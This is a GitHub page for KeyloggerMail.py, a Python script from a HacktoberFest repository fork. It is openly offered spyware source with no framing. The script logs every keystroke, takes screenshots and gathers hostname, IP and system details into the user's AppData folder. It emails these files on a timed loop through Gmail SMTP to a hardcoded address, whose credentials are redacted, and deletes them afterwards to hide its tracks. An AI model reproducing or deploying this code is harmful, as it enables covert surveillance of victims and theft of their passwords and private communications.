forked from shivangdubey/HacktoberFest2020
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathKeyloggerMail.py
211 lines (160 loc) · 6.23 KB
/
KeyloggerMail.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import smtplib
import socket
import platform
import pyscreenshot as ImageGrab
from pynput.keyboard import Key, Listener
import time
import os
flag = 0
system_information = "system.txt"
audio_information = "audio.wav"
# clipboard_information = "clipboard.txt"
screenshot_information = "screenshot.png"
keys_information = "key_log.txt"
extend = "\\"
file_path = f"{os.path.expanduser('~')}\\AppData" # "C:\\Users\\Public\\Roaming"
# Time Controls
time_iteration = 30 # 7200 # 2 hours
number_of_iterations_end = 1000000 # 5000
microphone_time = 10 # 600 is 10 minutes
# Email Controls
email_address = "[email protected] "
password = "[email protected]"
try:
# Send to email
def send_email(filename, attachment):
# Source code from geeksforgeeks.org
fromaddr = email_address
toaddr = email_address
# instance of MIMEMultipart
msg = MIMEMultipart()
# storing the senders email address
msg['From'] = fromaddr
# storing the receivers email address
msg['To'] = toaddr
# storing the subject
msg['Subject'] = f"{os.path.expanduser('~')}"
# string to store the body of the mail
body = f"{os.path.expanduser('~')}"
# attach the body with the msg instance
msg.attach(MIMEText(body, 'plain'))
# open the file to be sent
filename = filename
attachment = open(attachment, "rb")
# instance of MIMEBase and named as p
p = MIMEBase('application', 'octet-stream')
# To change the payload into encoded form
p.set_payload((attachment).read())
# encode into base64
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
# attach the instance 'p' to instance 'msg'
msg.attach(p)
# creates SMTP session
s = smtplib.SMTP('smtp.gmail.com', 587)
# start TLS for security
s.starttls()
# Authentication
s.login(fromaddr, password)
# Converts the Multipart msg into a string
text = msg.as_string()
# sending the mail
s.sendmail(fromaddr, toaddr, text)
# terminating the session
s.quit()
# Get Computer and Network Information
def computer_information():
with open(file_path + extend + system_information, "a") as f:
hostname = socket.gethostname()
IPAddr = socket.gethostbyname(hostname)
f.write("Processor: " + (platform.processor() + "\n"))
f.write("System: " + platform.system() + " " + platform.version() + "\n")
f.write("Machine: " + platform.machine() + "\n")
f.write("Hostname: " + hostname + "\n")
f.write("IP Address: " + IPAddr + "\n")
# Gather clipboard contents
# def copy_clipboard():
# with open(file_path + extend + clipboard_information, "a") as f:
# try:
# win32clipboard.OpenClipboard()
# pasted_data = win32clipboard.GetClipboardData()
# win32clipboard.CloseClipboard()
#
# f.write("Clipboard Data: \n" + pasted_data)
#
# except:
# f.write("Clipboard could not be copied.")
# Screenshot functionalities
def screenshot():
im = ImageGrab.grab()
im.save(file_path + extend + screenshot_information)
if flag == 0:
flag = 1
computer_information()
send_email(system_information, file_path + extend + system_information)
# copy_clipboard()
# send_email(clipboard_information, file_path + extend + clipboard_information)
screenshot()
send_email(screenshot_information, file_path + extend + screenshot_information)
# Time controls for keylogger
number_of_iterations = 0
currentTime = time.time()
stoppingTime = time.time() + time_iteration
while number_of_iterations < number_of_iterations_end:
count = 0
keys = []
counter = 0
def on_press(key):
global keys, count, currentTime
keys.append(key)
count += 1
currentTime = time.time()
if count >= 1:
count = 0
write_file(keys)
keys = []
def write_file(keys):
with open(file_path + extend + keys_information, "a") as f:
for key in keys:
k = str(key).replace("'", "")
if k.find("space") > 0:
f.write('\n')
f.close()
elif k.find("Key") == -1:
f.write(k)
f.close()
def on_release(key):
if key == Key.esc:
return False
if currentTime > stoppingTime:
return False
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
if currentTime > stoppingTime:
# Send keylogger contents to email
send_email(keys_information, file_path + extend + keys_information)
# Clear contens of keylogger log file.
with open(file_path + extend + keys_information, "w") as f:
f.write(" ")
# Take a screenshot and send to email
screenshot()
send_email(screenshot_information, file_path + extend + screenshot_information)
# Gather clipboard contents and send to email
# copy_clipboard()
# send_email(clipboard_information, file_path + extend + clipboard_information)
# Increase iteration by 1
number_of_iterations += 1
# Update current time
currentTime = time.time()
stoppingTime = time.time() + time_iteration
time.sleep(10) # Sleep two minutes before we delete all files
# Delete files - clean up our tracks
delete_files = [system_information, audio_information, screenshot_information, keys_information]
for file in delete_files:
os.remove(file_path + extend + file)
except:
print("Connection Lost ........Internet Issues ")